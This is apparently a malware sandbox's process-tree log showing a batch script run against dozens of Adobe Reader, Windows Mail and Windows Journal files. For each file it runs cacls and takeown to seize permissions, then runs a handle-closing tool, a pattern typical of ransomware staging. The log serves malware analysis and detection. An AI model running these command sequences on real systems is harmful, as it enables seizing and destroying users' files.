C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "email_all.gif" -nobanner3⤵PID:1380
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "email_all.gif" -nobanner4⤵PID:1852
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1676
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif""2⤵PID:952
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif" /E /G Admin:F /C3⤵PID:1444
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif"3⤵PID:1084
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "open_original_form.gif" -nobanner3⤵PID:572
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "open_original_form.gif" -nobanner4⤵PID:1256
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1264
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif""2⤵PID:1072
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif" /E /G Admin:F /C3⤵PID:1144
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif"3⤵
- Modifies file permissions
PID:800
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "rss.gif" -nobanner3⤵PID:1476
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "rss.gif" -nobanner4⤵PID:1696
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1572
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif""2⤵PID:1908
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif" /E /G Admin:F /C3⤵PID:896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif"3⤵PID:1000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "turnOffNotificationInTray.gif" -nobanner3⤵PID:880
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "turnOffNotificationInTray.gif" -nobanner4⤵PID:1920
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:204
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf""2⤵PID:1824
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf" /E /G Admin:F /C3⤵PID:816
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf"3⤵PID:904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "CourierStd-Oblique.otf" -nobanner3⤵PID:1264
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "CourierStd-Oblique.otf" -nobanner4⤵PID:952
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1480
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM""2⤵PID:216
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM" /E /G Admin:F /C3⤵PID:1696
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM"3⤵
- Modifies file permissions
PID:1568
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "SY______.PFM" -nobanner3⤵PID:1572
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "SY______.PFM" -nobanner4⤵PID:744
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1916
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt""2⤵PID:1380
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G Admin:F /C3⤵PID:1780
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"3⤵PID:1224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner3⤵PID:204
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner4⤵PID:1912
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:572
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp""2⤵PID:208
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp" /E /G Admin:F /C3⤵PID:952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp"3⤵PID:1144
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "can129.hsp" -nobanner3⤵PID:1480
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "can129.hsp" -nobanner4⤵PID:1824
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1476
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat""2⤵PID:1496
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat" /E /G Admin:F /C3⤵PID:744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat"3⤵PID:1752
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "icudt26l.dat" -nobanner3⤵PID:1916
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "icudt26l.dat" -nobanner4⤵PID:216
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:880
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT""2⤵PID:832
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT" /E /G Admin:F /C3⤵PID:1812
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT"3⤵
- Modifies file permissions
PID:816
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "ROMANIAN.TXT" -nobanner3⤵PID:572
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "ROMANIAN.TXT" -nobanner4⤵PID:1380
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1264
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT""2⤵PID:1284
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT" /E /G Admin:F /C3⤵PID:1824
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT"3⤵
- Modifies file permissions
PID:1800
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "CP1258.TXT" -nobanner3⤵PID:336
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "CP1258.TXT" -nobanner4⤵PID:828
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1572
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui""2⤵PID:1260
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C3⤵PID:216
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1780
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "msoeres.dll.mui" -nobanner3⤵PID:824
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "msoeres.dll.mui" -nobanner4⤵PID:956
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1256
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui""2⤵PID:816
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:1756
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:304
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:1224
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "WinMail.exe.mui" -nobanner4⤵PID:1908
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1152
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""2⤵PID:208
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C3⤵PID:336
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "background.png" -nobanner3⤵PID:1284
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "background.png" -nobanner4⤵PID:800
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:216
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""2⤵PID:1780
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C3⤵PID:1568
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1876
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "directories.acrodata" -nobanner3⤵PID:1692
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "directories.acrodata" -nobanner4⤵PID:1260
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:572
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵PID:304
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵PID:832
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1800
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "superbar.png" -nobanner3⤵PID:1988
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "superbar.png" -nobanner4⤵PID:816
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:556
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui""2⤵PID:896
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui" /E /G Admin:F /C3⤵PID:1992
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui"3⤵PID:1444
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "jnwdui.dll.mui" -nobanner3⤵PID:1928
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "jnwdui.dll.mui" -nobanner4⤵PID:960
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:824
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files\Windows Journal\Templates\Genko_1.jtp""2⤵PID:1876
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Genko_1.jtp" /E /G Admin:F /C3⤵PID:1752
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Genko_1.jtp"3⤵PID:1316
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "Genko_1.jtp" -nobanner3⤵PID:956
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "Genko_1.jtp" -nobanner4⤵PID:1780
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1476
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui""2⤵PID:1800
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:816
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui"3⤵PID:336
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:304
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "WinMail.exe.mui" -nobanner4⤵PID:1572
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1284
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:1444
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:960
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵
- Modifies file permissions
PID:1912
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "watermark.png" -nobanner3⤵PID:1028
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "watermark.png" -nobanner4⤵PID:896
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1692
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""2⤵PID:1316
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C3⤵PID:1496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"3⤵
- Modifies file permissions
PID:1824
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner3⤵PID:1260
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner4⤵PID:1876
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1988
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui""2⤵PID:336
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui" /E /G Admin:F /C3⤵PID:1084
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui"3⤵
- Modifies file permissions
PID:216
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "JNTFiltr.dll.mui" -nobanner3⤵PID:1424
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "JNTFiltr.dll.mui" -nobanner4⤵PID:744
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1928
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp""2⤵PID:1912
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp" /E /G Admin:F /C3⤵PID:1916
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp"3⤵PID:1756
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "Dotted_Line.jtp" -nobanner3⤵PID:208
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "Dotted_Line.jtp" -nobanner4⤵PID:1444
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:956
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui""2⤵PID:1824
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C3⤵PID:952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui"3⤵PID:556
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "msoeres.dll.mui" -nobanner3⤵PID:1480
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "msoeres.dll.mui" -nobanner4⤵PID:1316
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:304
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig""2⤵PID:216
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" /E /G Admin:F /C3⤵PID:1800
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"3⤵PID:1568
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "cryptocme2.sig" -nobanner3⤵PID:1572
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "cryptocme2.sig" -nobanner4⤵PID:1920
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1072
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif""2⤵PID:1752
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif" /E /G Admin:F /C3⤵PID:1444
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif"3⤵
- Modifies file permissions
PID:1476
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "ended_review_or_form.gif" -nobanner3⤵PID:956
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "ended_review_or_form.gif" -nobanner4⤵PID:1912
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1536
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif""2⤵PID:1780
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif" /E /G Admin:F /C3⤵PID:968
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif"3⤵PID:1000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "reviewers.gif" -nobanner3⤵PID:1084
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "reviewers.gif" -nobanner4⤵PID:1876
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1256
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif""2⤵PID:1928
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif" /E /G Admin:F /C3⤵PID:1796
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif"3⤵PID:1916
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "server_lg.gif" -nobanner3⤵PID:1028
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "server_lg.gif" -nobanner4⤵PID:592
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1380
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif""2⤵PID:1496
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif" /E /G Admin:F /C3⤵PID:320
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif"3⤵PID:1260
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "turnOnNotificationInTray.gif" -nobanner3⤵PID:1536
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "turnOnNotificationInTray.gif" -nobanner4⤵PID:1696
-
-
-
